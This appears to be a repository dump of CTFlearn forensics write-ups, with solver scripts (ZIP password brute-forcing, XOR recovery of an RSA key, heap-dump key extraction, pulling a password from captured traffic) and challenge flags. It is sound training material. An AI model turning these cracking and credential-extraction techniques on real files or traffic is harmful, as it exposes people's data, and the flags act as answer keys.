/Forensics/Brute Force is Fun!/output/zip/exploit.py:
--------------------------------------------------------------------------------
#!/usr/bin/python3
import itertools
import zlib
from string import digits
from zipfile import BadZipFile, ZipFile

# Every 5-digit suffix from "00000" to "99999"
brute = itertools.product(digits, repeat=5)

with ZipFile("00000012.zip") as zf:  # Path to 00000012.zip to be mentioned
    for i in brute:
        i = ''.join(i)
        password = "ctflag" + i
        try:
            zf.extractall(pwd=bytes(password, 'utf-8'))
        except (RuntimeError, BadZipFile, zlib.error):
            # Wrong password: rejected up front, or the data failed to inflate / CRC-check
            continue
        print("Flag: " + password)
        break  # Stop at the first password that extracts cleanly
--------------------------------------------------------------------------------
/Forensics/Brute Force is Fun!/output/zip/flag.txt:
--------------------------------------------------------------------------------
RkxBR3ttYXlfdGhlX2JydXRlX2ZvcmNlX2JlX3dpdGhfeW91fQ==
--------------------------------------------------------------------------------
/Forensics/Brute Force is Fun!/output/zip/flag.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Brute Force is Fun!/output/zip/flag.zip
--------------------------------------------------------------------------------
/Forensics/Brute Force is Fun!/output/zip/folders/73/43/p:
--------------------------------------------------------------------------------
Hmmm... almost!
The password is: "ctflag*****" where * is a number.
Encrypt the password using MD5 and compare it to the given hash!
As I said, you're gonna have to brute force the password!
Good luck! :)
--------------------------------------------------------------------------------
/Forensics/Brute Force is Fun!/output/zip/folders/73/47/p:
--------------------------------------------------------------------------------
Hmmm... almost!
The password is: "ctflag*****" where * is a number.
Encrypt the password using MD5 and compare it to the given hash!
As I said, you're gonna have to brute force the password!
Good luck! :)
--------------------------------------------------------------------------------
/Forensics/Chalkboard/README.md:
--------------------------------------------------------------------------------
## Chalkboard
The main idea of finding the flag is to use `strings`.

#### Step-1:
After I downloaded `math.jpg`, I tried using `strings`, `binwalk`, etc.



#### Step-2:
When I gave the input `strings math.jpg`

Output:

```
JFIF
The flag for this challenge is of the form:
CTFlearn{I_Like_Math_x_y}
where x and y are the solution to these equations:
3x + 5y = 31
7x + 9y = 59
...
```

#### Step-3:

Just solved the equations to get `x = 2` & `y = 5`.

#### Step-4:
Finally the flag becomes:
`CTFlearn{I_Like_Math_2_5}`

--------------------------------------------------------------------------------
/Forensics/Chalkboard/math.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Chalkboard/math.jpg
--------------------------------------------------------------------------------
/Forensics/Corrupted File/Edit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Corrupted File/Edit.png
--------------------------------------------------------------------------------
/Forensics/Corrupted File/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Corrupted File/Flag.png
--------------------------------------------------------------------------------
/Forensics/Corrupted File/README.md:
--------------------------------------------------------------------------------
## Corrupted File
The main idea of finding the flag is manipulating the header of the GIF.

#### Step-1:
After I downloaded `unopenable.gif`, it was not accessible. When I checked its hex dump online, it differed from the standard GIF header.

#### Step-2:
A standard GIF header should look like the hex dump mentioned here:
https://www.file-recovery.com/gif-signature-format.htm

So, I edited the header accordingly:



#### Step-3:
After downloading the new `New.gif`, if we view the GIF, it runs very fast.

But we can see a Base64-encoded text `ZmxhZ3tnMWZfb3JfajFmfQ==`

I decoded it online at: https://www.base64decode.org/

#### Step-4:
Finally the flag becomes:
`flag{g1f_or_j1f}`

--------------------------------------------------------------------------------
/Forensics/Corrupted File/unopenable.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Corrupted File/unopenable.gif
--------------------------------------------------------------------------------
/Forensics/Corrupted File/unopenable1.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Corrupted File/unopenable1.gif
--------------------------------------------------------------------------------
/Forensics/Digital Camouflage/Base64.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Digital Camouflage/Base64.png
--------------------------------------------------------------------------------
/Forensics/Digital Camouflage/README.md:
--------------------------------------------------------------------------------
## Digital Camouflage
The main idea for finding the flag is Network Interception and some Cryptographic Techniques.

#### Step-1:
After downloading `data.pcap` from the cloud, I directly opened it in Wireshark.

Those who are unaware of how to use this tool for Network Interception can refer here:
https://www.wireshark.org/

I tried to check the Hex Dump, but couldn't find anything special.

#### Step-2:
So, I tried to check the TCP stream in different frames. For those who are unaware of how to do this:

- Open `data.pcap` in Wireshark.
- In the filters, put on TCP and then Enter to get all the TCP traffic of the network.

- I wanted to check each and every frame as the question is somewhat hinting in that direction, so to check that, Analyse -> Follow -> TCP Stream

- We can alter streams by changing the counter in the bottom right corner.
- As I reached the 3rd stream, I observed some credentials there.

`userid=hardawayn&pswrd=UEFwZHNqUlRhZQ%3D%3D`

#### Step-3:
So, it is clear that the password is Base64-encoded and that, in web URLs, `%3D` is to be replaced by `=`.

So I tried to decode the Base64 encoding online at: https://www.base64decode.org/

It had the flag in it. Voila.

#### Step-4:
Finally the flag becomes:
`PApdsjRTae`
--------------------------------------------------------------------------------
/Forensics/Digital Camouflage/TCP_Stream.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Digital Camouflage/TCP_Stream.png
--------------------------------------------------------------------------------
/Forensics/Digital Camouflage/TCP_Stream_Eq_0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Digital Camouflage/TCP_Stream_Eq_0.png
--------------------------------------------------------------------------------
/Forensics/Digital Camouflage/TCP_Stream_Eq_3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Digital Camouflage/TCP_Stream_Eq_3.png
--------------------------------------------------------------------------------
/Forensics/Digital Camouflage/data.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Digital Camouflage/data.pcap
--------------------------------------------------------------------------------
/Forensics/Dumpster/Decryptor.java:
--------------------------------------------------------------------------------
import java.security.MessageDigest;
import java.util.Arrays;
import java.util.Base64;

import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;

public class Decryptor
{
    public static final String FLAG = "S+kUZtaHEYpFpv2ixuTnqBdORNzsdVJrAxWznyOljEo=";
    private static class Password
    {
        // AES key material: the first 16 bytes of SHA-256(password).
        private byte[] passHash;

        public Password(char[] pass) throws Exception
        {
            MessageDigest digest = MessageDigest.getInstance("SHA-256");
            this.passHash = Arrays.copyOf(digest.digest(new String(pass).getBytes("UTF-8")), 16);
        }

        public byte[] encrypt(byte[] msg) throws Exception
        {
            SecretKeySpec spec = new SecretKeySpec(passHash, "AES");
            Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
            cipher.init(Cipher.ENCRYPT_MODE, spec);
            return cipher.doFinal(msg);
        }

        public byte[] decrypt(byte[] msg) throws Exception
        {
            SecretKeySpec spec = new SecretKeySpec(passHash, "AES");
            Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
            cipher.init(Cipher.DECRYPT_MODE, spec);
            return cipher.doFinal(msg);
        }
    }

    public static void main(String[] args) throws Exception
    {
        // The Password object, and with it passHash, is still on the heap at the sleep below.
        Password pass = new Password(System.console().readPassword("Enter password to decrypt flag: "));
        System.out.println(new String(pass.decrypt(Base64.getDecoder().decode(FLAG.getBytes()))));
        Thread.sleep(5000); //We did a heap dump right here.
    }
}
--------------------------------------------------------------------------------
/Forensics/Dumpster/README.md:
--------------------------------------------------------------------------------
## Dumpster
The main idea for finding the flag is Java coding.

#### Step-1:
I tried hard to understand the question and solve it, but I couldn't do it, so I had to look up a writeup.

https://github.com/EladBeber/CTFlearn-Writeups/tree/master/Forensics/Medium/DUMPSTER

#### Step-2:

Finally the flag becomes:
`stCTF{h34p_6ump5_r_c00l!11!!}`
--------------------------------------------------------------------------------
/Forensics/Dumpster/dumpster.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Dumpster/dumpster.zip
--------------------------------------------------------------------------------
/Forensics/Dumpster/heapdump.hprof:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Dumpster/heapdump.hprof
--------------------------------------------------------------------------------
/Forensics/Exclusive Santa/Exclusive_Santa.rar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Exclusive Santa/Exclusive_Santa.rar
--------------------------------------------------------------------------------
/Forensics/Exclusive Santa/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Exclusive Santa/Flag.png
--------------------------------------------------------------------------------
/Forensics/Exclusive Santa/README.md:
--------------------------------------------------------------------------------
## Exclusive Santa
The main idea for finding the flag is using binwalk and Stegsolve.

#### Step-1:
After I downloaded `Exclusive_Santa.rar`, we have `1.png` & `3.png` in it.

When I tried `binwalk 3.png`, I got other `zip` files in it.

#### Step-2:
So, when we extract those and then use Stegsolve with Image Combiner (basically XOR), we get the flag.

#### Step-3:
Finally the flag becomes:
`CTFlearn{Santa_1s_C0ming}`
--------------------------------------------------------------------------------
/Forensics/Exif/Computer-Password-Security-Hacker - Copy.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Exif/Computer-Password-Security-Hacker - Copy.jpg
--------------------------------------------------------------------------------
/Forensics/Forensics 101/95f6edfb66ef42d774a5a34581f19052.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Forensics 101/95f6edfb66ef42d774a5a34581f19052.jpg
--------------------------------------------------------------------------------
/Forensics/GandalfTheWise/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/GandalfTheWise/Flag.png
--------------------------------------------------------------------------------
/Forensics/GandalfTheWise/Gandalf.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/GandalfTheWise/Gandalf.jpg
--------------------------------------------------------------------------------
/Forensics/GandalfTheWise/README.md:
--------------------------------------------------------------------------------
## GandalfTheWise
The main idea for finding the flag is to XOR strings.
#### Step-1:
After downloading `Gandalf.jpg`, I tried `strings Gandalf.jpg` and got this output. These are the initial strings embedded in the metadata of the image.

```
JFIF
+Q1RGbGVhcm57eG9yX2lzX3lvdXJfZnJpZW5kfQo=
+xD6kfO2UrE5SnLQ6WgESK4kvD/Y/rDJPXNU45k/p
+h2riEIj13iAp29VUPmB+TadtZppdw3AuO7JRiDyU
...
```

#### Step-2:
I decrypted the 1st Base64 encrypted string, i.e. `Q1RGbGVhcm57eG9yX2lzX3lvdXJfZnJpZW5kfQo=`, at https://cryptii.com/.

It gives a false flag `CTFlearn{xor_is_your_friend}`, but on the brighter side it gives the idea of XORing the next 2 strings.

#### Step-3:
So, I decrypted the remaining 2 strings to get hexadecimal texts because in that [RFC](https://datatracker.ietf.org/doc/html/rfc5987), ASCII text isn't possible.

#### Step-4:
I XOR them online at: http://xor.pw/ to get the flag.
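
Steps 1 to 4 of the GandalfTheWise writeup done offline instead of through web decoders, as an added example that is not part of the original writeup: it pulls printable runs from a byte blob as `strings` does, Base64-decodes the longest well-formed tail of each run (which drops the leading `+`), and XORs the equal-length pair. `SAMPLE` is constructed from the three strings quoted in Step-1, and all function names are this example's own.

```python
import base64
import binascii
import re
from itertools import combinations

# Constructed sample: a JFIF-style header followed by the three strings
# quoted in Step-1, separated by non-printable bytes. Not the real image.
SAMPLE = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00" + b"".join(
    b"\xff\xfe\x00" + s + b"\x00"
    for s in (
        b"+Q1RGbGVhcm57eG9yX2lzX3lvdXJfZnJpZW5kfQo=",
        b"+xD6kfO2UrE5SnLQ6WgESK4kvD/Y/rDJPXNU45k/p",
        b"+h2riEIj13iAp29VUPmB+TadtZppdw3AuO7JRiDyU",
    )
)

# Longest well-formed Base64 tail of a string: whole 4-character groups,
# optionally ending in one padded group.
B64_TAIL = re.compile(
    r"(?:[A-Za-z0-9+/]{4})+(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?\Z"
)


def printable_runs(blob, min_len=4):
    """Return runs of printable ASCII, as the `strings` tool would list them."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def base64_tails(runs, min_chars=16):
    """Decode the longest Base64-shaped tail of each run; skip short ones."""
    decoded = []
    for run in runs:
        m = B64_TAIL.search(run)
        if not m or len(m.group()) < min_chars:
            continue  # e.g. "JFIF" is Base64-shaped but too short to matter
        try:
            decoded.append(base64.b64decode(m.group(), validate=True))
        except binascii.Error:
            continue  # shaped like Base64 but not decodable
    return decoded


def xor_equal_length(blobs):
    """XOR every equal-length pair and keep results that are printable ASCII."""
    hits = []
    for a, b in combinations(blobs, 2):
        if len(a) != len(b):
            continue
        out = bytes(x ^ y for x, y in zip(a, b))
        if all(0x20 <= c <= 0x7e for c in out):
            hits.append(out)
    return hits


if __name__ == "__main__":
    decoded = base64_tails(printable_runs(SAMPLE))
    for d in decoded:
        print(len(d), d)
    for hit in xor_equal_length(decoded):
        print("XOR:", hit.decode("ascii"))
```

The first string decodes to readable text on its own, while the other two decode to 30 non-text bytes each, which is the cue that they belong together.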

#### Step-5:
Finally the flag becomes:

[comment]: <> (`CTFlearn{Gandalf.BilboBaggins}`)
--------------------------------------------------------------------------------
/Forensics/GandalfTheWise/String1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/GandalfTheWise/String1.png
--------------------------------------------------------------------------------
/Forensics/GandalfTheWise/String2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/GandalfTheWise/String2.png
--------------------------------------------------------------------------------
/Forensics/GandalfTheWise/String3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/GandalfTheWise/String3.png
--------------------------------------------------------------------------------
/Forensics/Git Is Good/gitIsGood.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Git Is Good/gitIsGood.zip
--------------------------------------------------------------------------------
/Forensics/Git Is Good/gitIsGood/flag.txt:
--------------------------------------------------------------------------------
flag{REDACTED}
--------------------------------------------------------------------------------
/Forensics/HailCaesar!/Base64.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/HailCaesar!/Base64.png
--------------------------------------------------------------------------------
/Forensics/HailCaesar!/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/HailCaesar!/Flag.png
--------------------------------------------------------------------------------
/Forensics/HailCaesar!/HailCaesar.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/HailCaesar!/HailCaesar.jpg
--------------------------------------------------------------------------------
/Forensics/I'm a dump/file:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/I'm a dump/file
--------------------------------------------------------------------------------
/Forensics/Jakarta/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Jakarta/Flag.png
--------------------------------------------------------------------------------
/Forensics/Jakarta/Jakarta.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Jakarta/Jakarta.jpg
--------------------------------------------------------------------------------
/Forensics/Jakarta/jakarta.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
from jakarta_data import *

parts = []
data = bytes(data)
# Split the blob on the JPEG end-of-image marker (FF D9)
parts = data.split(b'\xff\xd9')[:-1]

for i in range(len(parts)):
    print(i, parts[i][:16], '...', parts[i][-16:], len(parts[i]))

jpg = open('Jakarta.jpg', 'rb').read()
# Known plaintext: a PEM RSA key starts with this line
rsa_prefix = b'-----BEGIN RSA PRIVATE KEY-----'
xord_offset = 0
for r in range(0, len(parts[0]), len(rsa_prefix)):
    # XOR the known prefix with the ciphertext to get candidate keystream bytes
    xor_bytes = []
    for i in range(len(rsa_prefix)):
        xor_bytes.append(rsa_prefix[i]^parts[0][r+i])

    # Look for that keystream inside the cover image
    a = jpg.find(bytes(xor_bytes))
    if a != -1:
        print('found', a, r)
        xord_offset = a
        break

# XOR the first part with the image bytes from that offset to write out the key
with open('jakarta_rsa.key', 'wb') as fd:
    for i in range(len(parts[0])):
        fd.write(int.to_bytes(parts[0][i] ^ jpg[xord_offset+i], 1, 'little'))

with open('jakarta_flag', 'wb') as fd:
    fd.write(parts[3])
--------------------------------------------------------------------------------
/Forensics/Jakarta/jakarta_data.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Jakarta/jakarta_data.png
--------------------------------------------------------------------------------
/Forensics/Jakarta/jakarta_flag:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Jakarta/jakarta_flag
--------------------------------------------------------------------------------
/Forensics/Milk's Best Friend/_oreo.jpg.extracted/1/a:
--------------------------------------------------------------------------------


This is not the flag you are looking for.
-------------------------------------------------------------------------------- /Forensics/Milk's Best Friend/_oreo.jpg.extracted/1/b.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Milk's Best Friend/_oreo.jpg.extracted/1/b.jpg -------------------------------------------------------------------------------- /Forensics/Milk's Best Friend/_oreo.jpg.extracted/252B.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Milk's Best Friend/_oreo.jpg.extracted/252B.rar -------------------------------------------------------------------------------- /Forensics/Milk's Best Friend/b.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Milk's Best Friend/b.jpg -------------------------------------------------------------------------------- /Forensics/Milk's Best Friend/oreo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Milk's Best Friend/oreo.jpg -------------------------------------------------------------------------------- /Forensics/Minions/Hey_You.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Minions/Hey_You.png -------------------------------------------------------------------------------- /Forensics/Minions/Only_Few_Steps.jpg: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Minions/Only_Few_Steps.jpg -------------------------------------------------------------------------------- /Forensics/Minions/YouWon(Almost).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Minions/YouWon(Almost).png -------------------------------------------------------------------------------- /Forensics/Minions/_Hey_You.png.extracted/0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Minions/_Hey_You.png.extracted/0 -------------------------------------------------------------------------------- /Forensics/Minions/_Hey_You.png.extracted/5B: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Minions/_Hey_You.png.extracted/5B -------------------------------------------------------------------------------- /Forensics/Minions/_Hey_You.png.extracted/5B-0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Minions/_Hey_You.png.extracted/5B-0 -------------------------------------------------------------------------------- /Forensics/Minions/_Hey_You.png.extracted/D3EDB: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Minions/_Hey_You.png.extracted/D3EDB 
-------------------------------------------------------------------------------- /Forensics/Minions/_Hey_You.png.extracted/You_Still_Here/Nothing_Here_16/..txt: -------------------------------------------------------------------------------- 1 | https://mega.nz/file/wZw2nAhS#i3Q0r-R8psiB8zwUrqHTr661d8FiAS1Ott8badDnZko -------------------------------------------------------------------------------- /Forensics/Minions/_Only_Few_Steps.jpg.extracted/0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Minions/_Only_Few_Steps.jpg.extracted/0 -------------------------------------------------------------------------------- /Forensics/Minions/_Only_Few_Steps.jpg.extracted/1AA: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Minions/_Only_Few_Steps.jpg.extracted/1AA -------------------------------------------------------------------------------- /Forensics/Minions/_Only_Few_Steps.jpg.extracted/1E: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Minions/_Only_Few_Steps.jpg.extracted/1E -------------------------------------------------------------------------------- /Forensics/Minions/_Only_Few_Steps.jpg.extracted/22806: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Minions/_Only_Few_Steps.jpg.extracted/22806 -------------------------------------------------------------------------------- /Forensics/MountainMan/Flag.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/MountainMan/Flag.png -------------------------------------------------------------------------------- /Forensics/MountainMan/Hexdump.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/MountainMan/Hexdump.png -------------------------------------------------------------------------------- /Forensics/MountainMan/MountainMan.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/MountainMan/MountainMan.jpg -------------------------------------------------------------------------------- /Forensics/Mr.Bin/600x600_picture: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Mr.Bin/600x600_picture -------------------------------------------------------------------------------- /Forensics/Mr.Bin/D0F0.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Mr.Bin/D0F0.zip -------------------------------------------------------------------------------- /Forensics/Mr.Bin/bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Mr.Bin/bin -------------------------------------------------------------------------------- /Forensics/Mr.Bin/binwalk.png: 
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Mr.Bin/binwalk.png
--------------------------------------------------------------------------------
/Forensics/Mr.Bin/exploit.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
data = open('bin', 'rb').read()

w = 600  # bytes per row

with open('600x600_picture', 'wb') as fd:
    # Walk the file one row at a time
    for i in range(0, len(data), w):
        if data[i] == 0x10: break
        # Keep only rows that contain a '1', cropped to columns 200..363
        if b'1' in data[i:i+w]:
            fd.write(data[i+200:i+364])
            fd.write(b'\n')
--------------------------------------------------------------------------------
/Forensics/Mr.Bin/image.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Mr.Bin/image.jpg
--------------------------------------------------------------------------------
/Forensics/Mr.Bin/password.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Mr.Bin/password.png
--------------------------------------------------------------------------------
/Forensics/Music To My Ears/README.md:
--------------------------------------------------------------------------------
## Music To My Ears
The main idea for finding the flag is using the faad-faac tool to fix the corrupted m4a files.

#### Step-1:
After we download `hereisyourflag.m4a` from the cloud, we try to open it but it doesn't help much. We come to know that it is corrupted during encoding.

#### Step-2:
While searching for ways to reverse the corrupted `.m4a` files, I came across this [article](https://sysfrontier.com/en/2014/12/31/hello-world/). This way uses a tool combination called [faad](http://rarewares.org/aac-decoders.php)-[faac](http://rarewares.org/aac-encoders.php).

#### Step-3:
Finally the flag becomes:
`flag{1_c4n_f1x_it}`
--------------------------------------------------------------------------------
/Forensics/Music To My Ears/hereisyourflag.m4a:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Music To My Ears/hereisyourflag.m4a
--------------------------------------------------------------------------------
/Forensics/Naughty Cat/README.md:
--------------------------------------------------------------------------------
## Naughty Cat
The main idea to find the flag is to use advanced Forensics Techniques.

#### Step-1:
We are given `cut3_c4t.png`.

#### Step-2:
I referred to this to get an idea of how to solve it: https://github.com/SanketBaraiya/CTFlearn-Solutions/tree/main/Naughty%20Cat

#### Step-3:
Finally, the flag becomes:
`f0r3n51cs_ma5t3r`
--------------------------------------------------------------------------------
/Forensics/Naughty Cat/cut3_c4t.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Naughty Cat/cut3_c4t.png
--------------------------------------------------------------------------------
/Forensics/PDF by fdpumyp/README.md:
--------------------------------------------------------------------------------
## PDF by fdpumyp
The main idea to find the flag is to use strings and basic crypto recon.

#### Step-1:
We are given the document `dontopen.pdf`.

#### Step-2:
When we do a `strings dontopen.pdf`, we get the following output:
```bash
...
== SECRET DATA DONT LOOK AT THIS ==
external:Q1RGbGVhcm57KV8xbDB3M3kwVW0wMG15MTIzfQ==
pin:1234
password:MTIzMVdST05HOWlzamRuUEFTU1dPUkQ=
endstream
endobj
xref
0000149877 00000 n
13 1
0000150079 00000 n
trailer
<>
startxref
150295
%%EOF
```

#### Step-3:
I decoded that key using `echo Q1RGbGVhcm57KV8xbDB3M3kwVW0wMG15MTIzfQ== | base64 -d`.

Voila, I got the flag.

#### Step-4:
Finally, the flag becomes:
`CTFlearn{)_1l0w3y0Um00my123}`
--------------------------------------------------------------------------------
